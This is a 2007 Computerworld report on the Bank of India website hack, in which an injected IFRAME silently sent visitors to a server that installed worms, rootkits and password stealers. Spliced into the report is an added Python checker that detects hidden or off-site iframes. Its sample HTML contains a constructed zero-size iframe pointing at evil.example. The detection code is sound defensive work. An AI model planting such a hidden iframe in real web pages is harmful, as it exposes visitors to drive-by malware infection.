Bank of India site hacked, serves up 22 exploits
Reminiscent of Super Bowl site hack in January; notorious Russian gang suspected
Computerworld - The Bank of India Web site was hacked sometime Wednesday night (U.S. time) and seeded with a wide, wild array of malware that infected any users running unpatched browsers, security researchers said today.
Although the bank's site had been scoured of all malware by Friday morning, it's currently offline. "This site is under temporary maintenance and will be available after 09:00 IST on 1.09.07," a prominent message currently reads.
Researchers at Sunbelt Software Inc. first posted details of the hack yesterday afternoon after finding rogue code embedded in the site's HTML. That code, actually an IFRAME exploit, silently redirected users to a hacker server, which pushed 22 different pieces of malware onto vulnerable PCs. By Sunbelt's tally, the malware included one worm, three rootkits, five Trojan downloaders, and several password stealers. "The biggest issue is the sheer volume of malware we've had to analyze," said Alex Eckelberry, Sunbelt's CEO, in a blog posting yesterday.
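The injection described above, an IFRAME added to a legitimate page that silently loads content from an attacker's server, is the kind of change a site owner can catch by auditing their own published HTML. The following Python checker is an added example, not code from Sunbelt or the article; it flags iframes that point off-site or are hidden from the visitor, and the sample page and the hostnames `bank.example` and `evil.example` in it are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Record the attributes of every <iframe> in the document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":  # HTMLParser already lowercases tag names
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_hidden(attrs):
    """True for CSS-hidden frames or frames sized to zero pixels."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    # strip units such as "px" or "%" before comparing against zero
    width = int(re.sub(r"\D", "", attrs.get("width", "1")) or 1)
    height = int(re.sub(r"\D", "", attrs.get("height", "1")) or 1)
    return width == 0 or height == 0


def find_suspicious_iframes(html, site_host):
    """Return iframes that load from another host or are invisible to the user."""
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname or site_host  # relative src stays on-site
        off_site = host != site_host and not host.endswith("." + site_host)
        hidden = _is_hidden(attrs)
        if off_site or hidden:
            findings.append({"src": src, "off_site": off_site, "hidden": hidden})
    return findings


# Constructed sample: one legitimate frame, one injected zero-size off-site frame.
SAMPLE_HTML = """<html><body>
<iframe src="https://www.bank.example/rates" width="300" height="200"></iframe>
<iframe src="http://evil.example/in.cgi?3" width="0" height="0" style="display:none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for finding in find_suspicious_iframes(SAMPLE_HTML, "bank.example"):
        print(finding)
```

Running the checker against a fresh copy of each published page and diffing the result against a known-good baseline turns a silent injection into an alert rather than a customer report.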
Other researchers dug up more information. According to Roger Thompson, the chief technology officer of Exploit Prevention Labs Inc., the bank's site was compromised sometime between late Wednesday and early Thursday (U.S. time). How it was hacked, however, is not yet known, nor is how many bank customers might have been infected by the attacks.
When contacted Friday, executives and IT administrators at U.S. offices of Bank of India were unaware of the hack. Later, after reaching his colleagues in India, a U.S.-based spokesman said only: "They are aware of the problem. Bank IT and security people are working on this now." He had no other information on the severity of the attack or its duration, however.
For his part, Thompson posted a video of the hack (.wmv file download) that showed the massive infections and resulting system changes in a debugger window. At one point, he pointed out a couple of pop-ups that appeared during the infection. "The pop-ups aren't the problem, the problem is that you're already hosed if you're not patched," he said. "You're comprehensively owned at this point."
By 10:30 a.m. Eastern, the site was clean, Eckelberry reported.
All clues point to the notorious Russian Business Network (RBN) gang, said Eckelberry. Based in St. Petersburg, RBN has been dubbed "the baddest of the bad" by VeriSign iDefense, and is reportedly involved in everything from spamming and phishing to denial-of-service attacks and selling child pornography over the Internet.
"There has been speculation as to whether the malware was installed through an exploit framework -- Webattacker, Mpack, Icepack -- as it was encrypted in the same way as Webattacker," said Eckelberry.
Thompson confirmed the breach. In a blog of his own, Thompson said it looked like the "standard Mpack/Icepack stuff" to him.
The Bank of India hack is only the latest example of a legitimate Web site being compromised and serving up malware to unwary visitors. In the U.S., the most serious incident was earlier this year, when the site belonging to Dolphin Stadium, host to the National Football League's Super Bowl, was hacked just days before the big game.